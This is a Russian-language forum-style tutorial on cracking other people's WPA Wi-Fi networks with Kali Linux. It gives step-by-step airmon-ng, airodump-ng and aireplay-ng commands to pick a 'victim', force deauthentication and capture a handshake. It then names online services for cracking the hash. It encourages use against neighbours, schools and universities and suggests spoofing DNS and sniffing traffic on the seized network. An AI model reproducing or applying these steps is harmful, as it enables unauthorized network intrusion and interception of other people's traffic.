Взлом Wi-Fi

Взлом Wi-Fi


Конечно, вы скажете, в инете и так полно инфы об этом, но людей, которые не знают много, а значит, инфу эту они не нашли. Именно для вас я пишу эту тему!

Поехали. 

1. Скачиваем kali linux - https://www.kali.org/downloads/

1.1 Устанавливаем кали линукс на флешку или виртуальную машину

1.3 Запускаемся с флешки или виртуальной машины под кали

2. Открываем консоль 

2.1 Пишем: iwconfig и проверяем, определяется ли наша сетевая карта! Если у вас на этом моменте проблемы(с ноутбуками такого не будет), то вам нужно докупить эту карту. За 300 рублей можно взять юсб карту тплинк с алика и все будет в шоколаде.

2.2 Теперь включаем режим мониторинга: airmon-ng start wlan0(влан0 - это значение из параметров сетевой карты, у вас оно может быть немного иное, например mon0)

2.3 Теперь нужно провести сканирование: airodump-ng wlan0

2.4 Здесь мы увидим список вай фай сетей в радиусе нашего аппарата, зависит от сетевой карты. Здесь нужно выбрать объект атаки, выбираем на свой вкус, я обычно беру того у кого сигнал лучше(Уровень сигнала определяется сокращением pwr)

2.5 Теперь нам нужно нажать ctrl+c и остановить сканирование

2.6 Выбрали жертву и пишем: airodump-ng --bssid (здесь пишем бссайди роутера жертвы, его вы видите выше) --channel(тут пишем канал, он обозначивается как ch, например 1 или 8) -w /tmp/nazvanie (это путь где будет конечный файл и название) wlan0 

2.7 В самом низу видим тех, кто подключен к сети, выбираем того у кого в значении Frames большее количество(он более активен) 

3. Открываем еще одну консоль и пишем: aireplay-ng -0 1(1 - это кол-во пакетов деавторизации, ставьте сразу 50 и ждите) -а (здесь пишем бссайди роутера, его видим в самой верхней строке где его характеристики: уровень сигнала, канал и тд) -с (мак адрес пользователя, которого атакуем, узнать его мак можно под надписью STATION) wlan0

3.1 Ждем пока в первой консоли будет надпись с хендшейком, там еще время будет указано, она будет вверху. Делаем во второй консоли эту команду пока не пройдет хендшейк. Если совсем не проходит, то пишем эту команду заместо той: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 —ignore-negative-one( это для андроид устройств), еще можно деавторизовать сразу всю сеть aireplay-ng --deauth 5 -a (тут прописываешь мак роутера) wlan0

4. Когда получили хендшейк, идем по пути который мы указали и:

4.1 Расшифровываем этот хеш сами, даем людям которые могут это сделать

4.2 Обращаемся к сервису https://xsrc.ru(не рекл) и кидаем сюда хеш, он быстро находит(у меня за пару секунд), может быть дольше, но явно быстрее чем на моем ноуте 2009 года :D

После расшифровки вам на почту придет письмо-оповещение, а чтобы получить пароль нужен ключ, 1 стоит 100 рублей, чем больше - тем дешевле. Это единственный минус этого способа, но я предпочитаю его. После покупки ключа он придет на почту, далее вводите его на сайте и готово.

Вот и готово, далее с нашей, теперь нашей! сетью делаем что хотим: подменяем днс, слушаем трафик или просто смотрит фильмы и сидим на нашем любимом форуме :)

PS. Отпишите свое мнение об оформлении темы, удобно ли читать, не режет ли глаза и тд :)

PPS. Если есть вопросы, задавайте их только в этой теме! Потому что тем самым мы можем помочь сразу нескольким людям, у которых один вопрос.(и набить вам, новичкам, сообщения :D)

UPD. http://wpa-sec.stanev.org/ Сервис для бесплатной расшифровки хешей.

UPD2. Пару слов о безопасности в работе: 

Если использовать данный метод на соседях, в школе, вузе, и прочих простых местах - не беда. Если же вы пойдете на офис, компанию, либо какое-либо место, имеющее важные данные - будьте готовы. Изучите базовые понятия безопасности в kali linux. Хотя врятли в +- серьёзной компании стоит самая простая защита, которую можно вскрыть таким способом. Обычно. У них данные идут через свой сервер, который нужно ломать, чтобы получить пароль. 

О безопасности, когда вы сидите в взломанной/бесплатной точке wifi скажу пару правил:

Используйте VPN

Старайтесь не авторизовываться на важных сервисах

Либо пользуйтесь связкой VPN+TOP

Либо вместо впн можно юзать ssh туннель.

Report Page